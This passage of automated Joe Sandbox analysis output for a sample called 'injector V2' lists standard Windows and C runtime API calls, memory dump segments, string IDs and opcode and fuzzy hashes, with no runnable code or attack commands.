                                                                                    • Instruction ID: 011f415e91e5e5b69ac81c9ec62745c7eed27363568d33de7b20805fe90502ee
                                                                                    • Opcode Fuzzy Hash: c3883cfc76eef90477dc86f80c3d5233577d1adf882329254f29412588d35ced
                                                                                    • Instruction Fuzzy Hash: 3E511372A022029FDB2A8F14E891B7AB7E4FF16312F1444EDED05972A1E731ED49D790
                                                                                    APIs
                                                                                      • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F572
                                                                                    • __dosmaperr.LIBCMT ref: 00B4F579
                                                                                    • GetLastError.KERNEL32(00000000,00B4F8B4,?,?,00000000,?,?,?,00000000,00000000,?,00B4F8B4,?,?,?,00000000), ref: 00B4F5B3
                                                                                    • __dosmaperr.LIBCMT ref: 00B4F5BA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 1913693674-0
                                                                                    • Opcode ID: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                    • Instruction ID: 76521a857f5b0832f7d109ff8ab0f8d3037f6269f7ac3451eb492d8c058b6502
                                                                                    • Opcode Fuzzy Hash: 0ce96eb5ecaf084e1ed619947cbce0cc5f82e3837bb8527f9f94e519a23b3e7f
                                                                                    • Instruction Fuzzy Hash: 2321A771600617AFDB10AF658C8197BB7E9FF2436471085B9F86997250DB30EF40ABA1
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00B50212
                                                                                      • Part of subcall function 00B5010E: WideCharToMultiByte.KERNEL32(?,00000000,00B33046,00000000,00000000,00000000,000000FF,?,?,00000000,00B33046,?,00B4C071,?,00000000,?), ref: 00B5016F
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5024A
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5026A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 158306478-0
                                                                                    • Opcode ID: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                    • Instruction ID: 12d92b183119b71e6ad47d4cc7f8598abb6e544062f5b1b315ee1bfb4c76b93a
                                                                                    • Opcode Fuzzy Hash: 507738891ba6b25e576b98afd431d28e03af80b38d1db0edf54f0c0c9ee410a6
                                                                                    • Instruction Fuzzy Hash: 0011E1A2511A167E671137729CCEE6F6EEDDE86396B1004E4FC02A2102EEB1CE059575
                                                                                    APIs
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000), ref: 00B54417
                                                                                    • GetLastError.KERNEL32(?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?,?,00B512B7,00000000), ref: 00B54423
                                                                                      • Part of subcall function 00B54480: CloseHandle.KERNEL32(FFFFFFFE,00B54433,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?,?), ref: 00B54490
                                                                                    • ___initconout.LIBCMT ref: 00B54433
                                                                                      • Part of subcall function 00B54455: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B543F1,00B53BCF,?,?,00B51971,?,00000000,00000000,?), ref: 00B54468
                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00B53BE2,00000000,00000001,00000000,?,?,00B51971,?,00000000,00000000,?), ref: 00B54448
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                    • String ID:
                                                                                    • API String ID: 2744216297-0
                                                                                    • Opcode ID: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                    • Instruction ID: 43e1885cc9900822d50aae56e1f10bc73f010811f840e38796b0312f8d1d34ac
                                                                                    • Opcode Fuzzy Hash: 150d94e58e15aefaa22339708b0f3c6eb93d6b01ef7d051fb84f918a2386fa85
                                                                                    • Instruction Fuzzy Hash: 6AF09836540215BFCF221FD5AC09B993F6AEB087A6F054190FE1896230DF7288A0EB90
                                                                                    APIs
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00B52265
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2053465001.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2053450545.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053492172.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053516259.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053531797.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053546500.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2053561255.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___except_validate_context_record
                                                                                    • String ID: csm$csm
                                                                                    • API String ID: 3493665558-3733052814
                                                                                    • Opcode ID: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                    • Instruction ID: 40a31173d2aec64bc69540581e6911f60949990bdecf3b5e977b2c018a296dfd
                                                                                    • Opcode Fuzzy Hash: d5c06981bfc36291de2505b97a9cda873a24bd7453249828bd61b9ba05bc7eb6
                                                                                    • Instruction Fuzzy Hash: 2231CF36502205DFCF228F50CC40B6E7BA5FF0A316F1841DAFC584A121C336C9AADB85
                                                                                    APIs
                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B4F821
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
                                                                                    • Instruction ID: 26519f787e9162f85b47a5498e3652c7fc16b181adb8d4893e790f1473ee2040
                                                                                    • Opcode Fuzzy Hash: 0ae6f514362f4626b441c296be7d10fb3397e6717d59fabab093f32f9d1e663b
                                                                                    • Instruction Fuzzy Hash: F971C47190515AAFDF20AF38DC89BBABBF9EB05304F1441E9E449A7211DA358F85AF10
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B496BB
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00B49787
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00B497A7
                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00B497B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                    • String ID:
                                                                                    • API String ID: 254469556-0
                                                                                    • Opcode ID: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                    • Instruction ID: ca03c3964246066d95ffd6abfea1d31a0c15c33ffc1fe09476ad374cbbd18999
                                                                                    • Opcode Fuzzy Hash: 3eb1fcac3bba856d3eb4b39082b71cb6ea4b334ed7d168fd5e985e099eff3e37
                                                                                    • Instruction Fuzzy Hash: 8C31E4B59453189BDB10EFA4D9897CDBBF8AF18300F1041EAE40DAB250EB719B859F45
                                                                                    APIs
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00B526E2
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00B527F0
                                                                                    • CatchIt.LIBVCRUNTIME ref: 00B52841
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00B52942
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00B5295D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 4119006552-393685449
                                                                                    • Opcode ID: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                    • Instruction ID: 45a4c17138b49329cb54cc857b4d2e34239410fffe1e70bf8a685df44acc8902
                                                                                    • Opcode Fuzzy Hash: 2bdcb8ccc59f528826b422666d78671f02c3ac73dba88527aef0c7ace8a97b52
                                                                                    • Instruction Fuzzy Hash: 2FB138318022099FCF19DFA4C881AAEBBF5FF19316F1441E9EC116B212D731EA59DB91
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                    • String ID:
                                                                                    • API String ID: 127012223-0
                                                                                    • Opcode ID: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                    • Instruction ID: ef56e744ecc62a0cdb393fb7d56e5de3f10b317e78d9dbf0201db979e886ab86
                                                                                    • Opcode Fuzzy Hash: 0447742c2b698f47873432dcdd49fc57277fe89d1e32482df5cfc4ebc8661ca4
                                                                                    • Instruction Fuzzy Hash: B47101729007056ADF219F648C81BAE7BFAEF5531AF2800D9ED14B7281D731DDC887A1
                                                                                    APIs
                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00B44997
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___std_exception_copy
                                                                                    • String ID: (^Hx$(^Hx$(^Hx
                                                                                    • API String ID: 2659868963-1348055467
                                                                                    • Opcode ID: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                    • Instruction ID: 6f58e69f9acafb190962dc9b945ee23934eec273c76a039be9a21e7f5379995f
                                                                                    • Opcode Fuzzy Hash: e7ab19fc00a675cc0460a21f5787312162d33fd94931c8af76f0f6e8addad2a7
                                                                                    • Instruction Fuzzy Hash: 24811B362043005F8B24DA29A9C833E72D1E798321F7C8AD5E5A1CB7E1EF75CA54B742
                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B49E77
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00B49E7F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B49F08
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00B49F33
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B49F88
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
                                                                                    • Instruction ID: c778cff382c8a130e6a90332a1503ec3ce4e834225436c6d2fe64578e38955a9
                                                                                    • Opcode Fuzzy Hash: 24e524fd0fb79f98a9658a351eb220649c5f459267e1c9b79e84e700a247911c
                                                                                    • Instruction Fuzzy Hash: 0041A334A002199BCF10DF68D881A9FBBE5EF45324F1481D5E8189B392E731EF19DB91
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BB40E64E,?,00B4C9A9,?,00B2782F,00000000,00000000), ref: 00B4C95B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                    • Instruction ID: e78ad31aadc7077bf82e3991a8323a17f6b405207be3a1e0dd368f393e601a96
                                                                                    • Opcode Fuzzy Hash: 480a960c1a1e2f9d003609983796ca108e9d7d45f0b39af801e2731a75a18c06
                                                                                    • Instruction Fuzzy Hash: B021D531A06311BBD7629F68DC80B5A3FE9EB45BA1F1405E0E815A7291DB30EF00E6D1
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,00B4C135,00B49C1D,00B49814), ref: 00B4C14C
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00B4C15A
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B4C173
                                                                                    • SetLastError.KERNEL32(00000000,00B4C135,00B49C1D,00B49814), ref: 00B4C1C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: 8743e1b21195abc100e3127bd03bc75bdcf62cebe8cbbd6cad65db3cd73eee70
                                                                                    • Instruction ID: b2520602d1ed2a7e875443044bea62556673610a05484073213e86828acfb73e
                                                                                    • Opcode Fuzzy Hash: 8743e1b21195abc100e3127bd03bc75bdcf62cebe8cbbd6cad65db3cd73eee70
                                                                                    • Instruction Fuzzy Hash: D701D83210A7116DB66527B56CC5F263FD4CB11F7B72003FAF524660E2EE514D057594
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: string too long$eIY$eIY$eIY
                                                                                    • API String ID: 0-1759105153
                                                                                    • Opcode ID: 8bfbc5a3a0a90429a666a28c06245bd3debad346119aa750c190e8280aeff039
                                                                                    • Instruction ID: d9afd177c426faec93623f18da094c4209e4a4c3d86f08d877b01ec17a471646
                                                                                    • Opcode Fuzzy Hash: 8bfbc5a3a0a90429a666a28c06245bd3debad346119aa750c190e8280aeff039
                                                                                    • Instruction Fuzzy Hash: 1521562330426197AE280A2CF88522E3AC38AE17B0F3A45EAD4196F256C637CCD59252
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,?,00B563AE,000000FF), ref: 00B4A95A
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,00B563AE,000000FF), ref: 00B4A96C
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00B563AE,000000FF), ref: 00B4A98E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                    • Instruction ID: 24203e575b2ee8810862d8aabf323c60fa59f5a16aed9dcb0b7edf1ccdef18fd
                                                                                    • Opcode Fuzzy Hash: 2f298a5ae5b9a4433df680da809e6894f8bb14610e5485a68d845eabd7adc129
                                                                                    • Instruction Fuzzy Hash: 5301A271950719AFDB128F54DC09BAEBBF8FB44B16F0402A9E811A36E0EB749904CA90
                                                                                    APIs
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B50F0D
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B50FD6
                                                                                    • __freea.LIBCMT ref: 00B5103D
                                                                                      • Part of subcall function 00B4EB9B: HeapAlloc.KERNEL32(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD
                                                                                    • __freea.LIBCMT ref: 00B51050
                                                                                    • __freea.LIBCMT ref: 00B5105D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_b20000_injector V2.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1096550386-0
                                                                                    • Opcode ID: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                    • Instruction ID: 1f6971281628d21f245d5bcfc780716d454275995275f21cbc0fd42626e7dee7
                                                                                    • Opcode Fuzzy Hash: d98721fd5ca2e3b851e00c9b5dac70bd5c13ffed10352ae3b2d83271b9be267c
                                                                                    • Instruction Fuzzy Hash: 3651E672600256AFDB206F68CC81FBB7BE9EF44712F1908E9FD04D6181EB74DD889660
                                                                                    APIs
                                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00B528EE,?,?,00000000,00000000,00000000,?), ref: 00B52A0D
                                                                                    • CatchIt.LIBVCRUNTIME ref: 00B52AF3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2052985682.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2052971435.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053021103.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053045803.0000000000B5D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053086433.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2053106983.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
